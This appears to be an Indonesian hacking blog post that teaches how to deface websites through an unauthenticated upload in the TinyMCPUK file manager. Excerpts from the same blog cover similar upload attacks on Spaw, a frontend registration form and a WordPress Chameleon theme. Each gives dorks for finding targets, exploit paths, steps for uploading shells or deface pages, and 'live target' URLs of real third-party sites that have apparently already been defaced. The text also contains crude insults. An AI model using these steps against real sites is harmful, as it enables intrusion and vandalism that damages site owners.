Langsung ke konten utama

Deface Tinymcpuk mediatech



Kembali lagi dengan Sayah; v
Oke aja langsung gasken ke tutor nyah;v

Bahan & Alat
1. Hp/pc
2. Browser kesayangan
3. Dork : All rights reserved. © 2015 Media Tech Indonesia
4. Exploit : /tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash
5. Shell/Script deface. Extensi tambahin .fla

HTML : asw.htm.fla
PHP : asw.php.fla

Live Target
http://www.rentalmobilsurabaya.org/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash

Langkah-langkah :
1. Dorking dulu lah sampe nemu target, buat belajar tu diatas ada live.

2. Udah nemu target? Masukkin exploitnya, contoh :

target.com/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash

3. Lihat bawah......
Ada tuh tempat upload, ya udah tinggal upload, mau shell/script deface, w nitip aja yak :v ya kerna emang ga support php cuk :'v

4. Jika sudah upload, tinggal panggil scriptnya seperti ini.

target.com/tinymcpuk/gambar/Flash/asw.php.fla

Hasil :
http://www.rentalmobilsurabaya.org/tinymcpuk/gambar/Flash/tt.htm.fla

Sekian ae ya cuk :v

Komentar

Postingan populer dari blog ini

Cara Deface spaw upload

Deface Spaw Upload Vulnerability + Live Target Bahan-bahan : 1. HP/PC 2. Kuota (wajib) 3. Jembud (wajib) 4. Dork : ** inurl:"spaw2/upload/files/" 5. Script deface. ** ext : .txt / .html 6. Exploit : spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files Langkah-langkah : 1. Dorking lah njink kek biasa. 2. Jika udah nemu masukkan exploit nya, seperti dibawah. www.xnxx.com/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files atau www.xnxx.com/[path]/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files 3. Cari tulisan image, pencet, rubah jadi file. 4. Pilih file, upload. 5. Cari filenya, cari tulisan "download file" 6. Pencet tuh, a

Deface Frontend Register Upload + Live Target

Deface Frontend Register Upload + Live Target Bahan-bahan: • HP/PC • Kuota • Jembud (wajib) • Browser Kesayangan • Dork + inurl:/index.php/en/147/featured • Script deface + Ext: .txt (gabisa up .html) Langkah-langkah: - Dorking dulu lah sono, sampe nemu target. - Masuk ke salah satu web, lalu cari tempat Login/Registrasi (Cari tombolnya cuk) - Registrasi dulu, inget username sama Password nya. - Udah registrasi? Login lah. Terus klik "My Profile" - Scroll kebawah, add file. - Pencet lama kaca pembesar, buka di tab baru (PC klik kanan) Atau bisa juga gini. xnxx.go.id/files/tod.txt Done! Live Target + http://www.ozpropertysale.com.au/index.php/en/147/featured Hasil. + http://www.ozpropertysale.com.au/files/duar.txt # sumber dari misetong padahal dia juga liat ya , kan kontol

Deface metode wp chameleon

Assalamualaikum wr wb Kembali lagi dengan Sayah Randi;v Oke jangan banyak bacot langsung aja ke tutor nya;v •  Bahan bahan : 1. Android/PC 2. kuota/WiFi 3. Script Deface 4. Tools Crsf >  Touch Me Senpai > Dork : -  inurl:/wp-content/themes/cameleon/ > Exploit : - /wp-content/themes/cameleon/includes/fileuploader/upload_handler.php •  Langkah- langkah : Pertama kalian dorking google dulu pakek dork di atas. Nahh kalo udah pilih salah satu web nya. Nahh sekarang tinggal nentuin vuln apa kaga nya.Caranya? Masukin exploit di atas. Ex : www.target.coli/wp-content/themes/cameleon/includes/fileuploader/upload_handler.php Kalo vuln kek gambar di bawah ini. Nah klo udah begitu kita tinggal ke crsf nya Kolom  URL  isi link web vuln tadi, POST File  isi dengan  qqfile  kemudian klik  Kunci . Klik  Pilih File  kemudian pilih file lu abis itu klik  Upload .Klo berhasil tandanya muncul kata Succes BLA BLA BLA:V Tinggal kita panggil dah:v • www.t